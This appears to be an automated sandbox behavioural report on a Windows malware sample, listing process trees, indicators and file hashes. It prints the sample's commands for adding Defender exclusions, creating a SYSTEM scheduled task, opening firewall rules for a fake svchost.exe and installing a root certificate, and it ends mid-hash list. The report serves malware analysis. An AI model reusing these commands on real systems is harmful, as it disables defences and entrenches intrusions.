040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd ~tlDA1A.tmp -
Suspicious behavior: EnumeratesProcesses 39 IoCs
Processes:
powershell.exepowershell.exetmp.exepowershell.exepowershell.exe~tlFA34.tmppowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe~tlDA1A.tmppowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe~tl2849.tmppowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe~tl7D1C.tmppowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe~tlDEEA.tmppowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe~tl4396.tmppowershell.exepowershell.exepid process 2760 powershell.exe 2408 powershell.exe 2172 tmp.exe 3052 powershell.exe 2996 powershell.exe 868 ~tlFA34.tmp 1884 powershell.exe 2744 powershell.exe 868 ~tlFA34.tmp 3064 svchost.exe 2264 powershell.exe 2100 powershell.exe 2544 ~tlDA1A.tmp 948 powershell.exe 240 powershell.exe 2104 svchost.exe 700 powershell.exe 2000 powershell.exe 876 ~tl2849.tmp 1348 powershell.exe 2904 powershell.exe 292 svchost.exe 1352 powershell.exe 1764 powershell.exe 980 ~tl7D1C.tmp 436 powershell.exe 2568 powershell.exe 1560 svchost.exe 1196 powershell.exe 2776 powershell.exe 2040 ~tlDEEA.tmp 2516 powershell.exe 2096 powershell.exe 2188 svchost.exe 2608 powershell.exe 2704 powershell.exe 2516 ~tl4396.tmp 2972 powershell.exe 904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 904 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.exesvchost.exe~tlFA34.tmpsvchost.exedescription pid process target process PID 2172 wrote to memory of 2760 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2760 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2760 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2408 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2408 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2408 2172 tmp.exe powershell.exe PID 2172 wrote to memory of 2696 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 2696 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 2696 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 1080 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 1080 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 1080 2172 tmp.exe schtasks.exe PID 2172 wrote to memory of 1976 2172 tmp.exe svchost.exe PID 2172 wrote to memory of 1976 2172 tmp.exe svchost.exe PID 2172 wrote to memory of 1976 2172 tmp.exe svchost.exe PID 1976 wrote to memory of 3052 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 3052 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 3052 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 2996 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 2996 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 2996 1976 svchost.exe powershell.exe PID 1976 wrote to memory of 868 1976 svchost.exe ~tlFA34.tmp PID 1976 wrote to memory of 868 1976 svchost.exe ~tlFA34.tmp PID 1976 wrote to memory of 868 1976 svchost.exe ~tlFA34.tmp PID 868 wrote to memory of 2600 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 2600 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 2600 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 2496 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 2496 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 2496 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 1092 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 1092 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 1092 868 ~tlFA34.tmp netsh.exe PID 868 wrote to memory of 1884 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 1884 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 1884 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 2744 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 2744 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 2744 868 ~tlFA34.tmp powershell.exe PID 868 wrote to memory of 912 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 912 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 912 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 2988 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 2988 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 2988 868 ~tlFA34.tmp schtasks.exe PID 868 wrote to memory of 3064 868 ~tlFA34.tmp svchost.exe PID 868 wrote to memory of 3064 868 ~tlFA34.tmp svchost.exe PID 868 wrote to memory of 3064 868 ~tlFA34.tmp svchost.exe PID 3064 wrote to memory of 1824 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 1824 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 1824 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2368 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2368 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2368 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2288 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2288 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2288 3064 svchost.exe netsh.exe PID 3064 wrote to memory of 2264 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2264 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2264 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2100 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2100 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2100 3064 svchost.exe powershell.exe PID 3064 wrote to memory of 2544 3064 svchost.exe ~tlDA1A.tmp -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Timer"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM2⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\~tlFA34.tmpC:\Users\Admin\AppData\Local\Temp\~tlFA34.tmp3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645114⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Timer"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM4⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645115⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\~tlDA1A.tmpC:\Users\Admin\AppData\Local\Temp\~tlDA1A.tmp5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645116⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {0E25D836-BCC5-4836-91D8-B094B15E3EEE} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645113⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\~tl2849.tmpC:\Windows\TEMP\~tl2849.tmp3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645114⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {070CB1C9-FCDA-4A23-874E-6340EAF4C01B} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645113⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\~tl7D1C.tmpC:\Windows\TEMP\~tl7D1C.tmp3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645114⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {F200F5C0-D00F-4BC8-AF25-048F879BF06E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645113⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\~tlDEEA.tmpC:\Windows\TEMP\~tlDEEA.tmp3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645114⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {0FC8BD48-801F-4A83-98EF-B9A6301E6FFD} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645113⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\~tl4396.tmpC:\Windows\TEMP\~tl4396.tmp3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh int ipv4 set dynamicport tcp start=1025 num=645114⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5a263a03d5ab8e7138fb30d9dbb09dc93
SHA11bba3831e13049225205b6ea9821cf153f8c75e6
SHA25638395752fe80f6f42fb4c991e6534f4636a50fdfdb77a34b31e0fcef38df6d7c
SHA51260d232f3caefa5163d11a64808555310a65f417ae1ee6fa8615737ff367ebc24270f7dc6ae49043e597466cd5eee2cf96a79da42b1a586aab2f919a8c32c3763
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD53bf321a36fa0f0002aed694d1e195625
SHA1d48e1e20f1c7f9819490d199fcf9023ec1d02438
SHA256ad44cc12fc479403bc1adb1e7324ceebc3841e02313a93d4d540c6e646435cb8
SHA512fe0a6443b3651f1213b18aa30aa71983b1d50e455a6d2b1680cc013ab937d09fe030140a24f434e04dba507065fc0fb3406ebc42484692821c90beded331123d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD541582c89d4cd066a6140bdb839daac97
SHA1758769c10f77e73a4e0b30610757fa020017e2a7
